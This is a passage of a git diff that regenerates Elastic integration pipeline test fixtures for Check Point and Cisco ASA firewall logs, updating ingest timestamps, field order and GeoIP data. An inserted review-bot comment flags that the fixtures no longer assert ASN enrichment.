@@ -1208,7 +1178,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083423700Z", + "ingested": "2021-12-14T14:36:07.875468808Z", "original": "\u003c134\u003e1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.100\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"60226\"; service:\"22\"; service_id:\"ssh\"; src:\"192.168.1.205\"]", "kind": "event", "action": "Accept", 
@@ -1277,7 +1247,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083428Z", + "ingested": "2021-12-14T14:36:07.875469195Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml index 3f2c7396e67..0fcc2a12b16 100644 --- a/packages/checkpoint/manifest.yml +++ b/packages/checkpoint/manifest.yml @@ -1,6 +1,6 @@ name: checkpoint title: Check Point -version: 1.2.1 +version: 1.2.2 release: ga description: Collect logs from Check Point with Elastic Agent. type: integration diff --git a/packages/cisco/changelog.yml b/packages/cisco/changelog.yml index b7d42588364..7209b89c291 100644 --- a/packages/cisco/changelog.yml +++ b/packages/cisco/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.5" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.12.4" changes: - description: Change test public IPs to the supported subset 
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json index e7edee78768..f3701aab74a 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -63,7 +63,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162829200Z", + "ingested": "2021-12-14T14:36:13.057627392Z", "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", @@ -150,7 +150,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162839Z", + "ingested": "2021-12-14T14:36:13.057630410Z", "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162845100Z", + "ingested": "2021-12-14T14:36:13.057630905Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -243,16 +243,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { 
@@ -276,13 +266,20 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:31:25.162851100Z", + "ingested": "2021-12-14T14:36:13.057631270Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -301,19 +298,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -337,12 +327,19 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162855800Z", + "ingested": "2021-12-14T14:36:13.057631640Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -359,7 +356,10 @@ "asa": { "source_interface": "net" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -408,7 +408,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162861200Z", + "ingested": "2021-12-14T14:36:13.057632027Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", @@ -490,7 +490,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162867800Z", + "ingested": "2021-12-14T14:36:13.057632384Z", "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", 
@@ -569,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162873700Z", + "ingested": "2021-12-14T14:36:13.057632745Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", @@ -643,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162880900Z", + "ingested": "2021-12-14T14:36:13.057633632Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -725,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162886600Z", + "ingested": "2021-12-14T14:36:13.057634031Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -768,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162890900Z", + "ingested": "2021-12-14T14:36:13.057634409Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -788,16 +788,6 @@ ] }, { - "log": { - "level": "warning" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "1", - "transport": "icmp" - }, "observer": { "ingress": { "interface": { 
@@ -818,12 +808,15 @@ "dev01" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162896700Z", + "ingested": "2021-12-14T14:36:13.057634959Z", "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", @@ -839,6 +832,13 @@ "asa": { "source_interface": "fw111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "1", + "transport": "icmp" } }, { @@ -888,7 +888,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162903400Z", + "ingested": "2021-12-14T14:36:13.057635336Z", "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", @@ -910,16 +910,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -943,12 +933,19 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162910Z", + "ingested": "2021-12-14T14:36:13.057635687Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -965,19 +962,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { 
@@ -1001,13 +991,20 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:31:25.162916500Z", + "ingested": "2021-12-14T14:36:13.057636049Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1026,7 +1023,10 @@ "asa": { "source_interface": "identity" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -1075,7 +1075,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162923100Z", + "ingested": "2021-12-14T14:36:13.057636410Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", @@ -1141,7 +1141,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162929900Z", + "ingested": "2021-12-14T14:36:13.057636881Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -1220,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:25.162936400Z", + "ingested": "2021-12-14T14:36:13.057637245Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1306,7 +1306,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162942900Z", + "ingested": "2021-12-14T14:36:13.057637610Z", "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", @@ -1386,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:25.162949400Z", + "ingested": "2021-12-14T14:36:13.057637986Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1456,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162956Z", + "ingested": "2021-12-14T14:36:13.057638359Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1532,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162962600Z", + "ingested": "2021-12-14T14:36:13.057638717Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162969500Z", + "ingested": "2021-12-14T14:36:13.057639099Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", 
@@ -1679,7 +1679,7 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-12-09T13:31:25.162976200Z", + "ingested": "2021-12-14T14:36:13.057639576Z", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", @@ -1765,7 +1765,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162982800Z", + "ingested": "2021-12-14T14:36:13.057639938Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1852,7 +1852,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162992400Z", + "ingested": "2021-12-14T14:36:13.057640297Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1931,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162997900Z", + "ingested": "2021-12-14T14:36:13.057640742Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2001,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163003300Z", + "ingested": "2021-12-14T14:36:13.057641120Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", 
@@ -2072,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.163009800Z", + "ingested": "2021-12-14T14:36:13.057641481Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2142,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163016400Z", + "ingested": "2021-12-14T14:36:13.057641836Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2212,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163020900Z", + "ingested": "2021-12-14T14:36:13.057642198Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2282,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163026300Z", + "ingested": "2021-12-14T14:36:13.057642558Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2357,7 +2357,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163033Z", + "ingested": "2021-12-14T14:36:13.057642918Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", 
@@ -2431,7 +2431,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163038700Z", + "ingested": "2021-12-14T14:36:13.057643280Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2505,7 +2505,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163043700Z", + "ingested": "2021-12-14T14:36:13.057643750Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2582,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-12-09T13:31:25.163049Z", + "ingested": "2021-12-14T14:36:13.057644110Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2661,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-12-09T13:31:25.163053700Z", + "ingested": "2021-12-14T14:36:13.057644480Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2712,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163059400Z", + "ingested": "2021-12-14T14:36:13.057644837Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", 
@@ -2763,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163065900Z", + "ingested": "2021-12-14T14:36:13.057645193Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2839,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163072400Z", + "ingested": "2021-12-14T14:36:13.057645554Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2916,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163078900Z", + "ingested": "2021-12-14T14:36:13.057645905Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2962,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163085500Z", + "ingested": "2021-12-14T14:36:13.057646262Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3005,7 +3005,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163091900Z", + "ingested": "2021-12-14T14:36:13.057646638Z", "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", 
@@ -3074,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.163098400Z", + "ingested": "2021-12-14T14:36:13.057646992Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3118,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163104800Z", + "ingested": "2021-12-14T14:36:13.057647348Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", @@ -3161,7 +3161,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163111300Z", + "ingested": "2021-12-14T14:36:13.057647704Z", "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", @@ -3233,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163117800Z", + "ingested": "2021-12-14T14:36:13.057648068Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3278,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163124200Z", + "ingested": "2021-12-14T14:36:13.057648427Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", 
@@ -3361,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163130700Z", + "ingested": "2021-12-14T14:36:13.057648780Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3437,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163137100Z", + "ingested": "2021-12-14T14:36:13.057649137Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", @@ -3500,7 +3500,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163143800Z", + "ingested": "2021-12-14T14:36:13.057649999Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", @@ -3562,7 +3562,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163150300Z", + "ingested": "2021-12-14T14:36:13.057650412Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]", "code": "304001", "kind": "event", @@ -3624,7 +3624,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163155200Z", + "ingested": "2021-12-14T14:36:13.057650767Z", "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23", "code": "304001", "kind": "event", @@ -3686,7 +3686,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163160400Z", + "ingested": "2021-12-14T14:36:13.057651143Z", "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/", "code": "304001", "kind": "event", 
@@ -3711,20 +3711,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3734,20 +3728,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -3797,7 +3785,7 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-12-09T13:31:25.163166600Z", + "ingested": "2021-12-14T14:36:13.057651499Z", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", @@ -3875,7 +3863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163172300Z", + "ingested": "2021-12-14T14:36:13.057651851Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", 
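Review bot: The regenerated expectation for 81.2.69.144 no longer contains the `destination.as` / `source.as` object (`"number": 20712` and the organization name), not merely different geo coordinates, so the pipeline test stops asserting that ASN enrichment runs for this address at all; the same drop recurs in the later hunks of this file (from `@@ -4396` through `@@ -5455`) and in test-asa-fix.log-expected.json at `@@ -721`. This presumably reflects a different GeoIP test database bundled with the newer elastic-package rather than a change to the ingest pipeline, but that inference should be confirmed in the commit description, since a silent regression in the pipeline's `as.*` enrichment would produce exactly this diff. A short note in the description stating that `as.*` is intentionally unasserted after this change would keep the next regeneration from being misread.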
@@ -3952,7 +3940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163176700Z", + "ingested": "2021-12-14T14:36:13.057652218Z", "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -3975,16 +3963,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "console", - "domain": "console" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4001,12 +3979,19 @@ "console" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "console", + "domain": "console" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163182Z", + "ingested": "2021-12-14T14:36:13.057652571Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4022,19 +4007,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4056,15 +4034,22 @@ "10.10.0.87" ] }, + "log": { + "level": "notification" + }, "host": { "user": { "name": "enable_15" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163188600Z", + "ingested": "2021-12-14T14:36:13.057652923Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4080,7 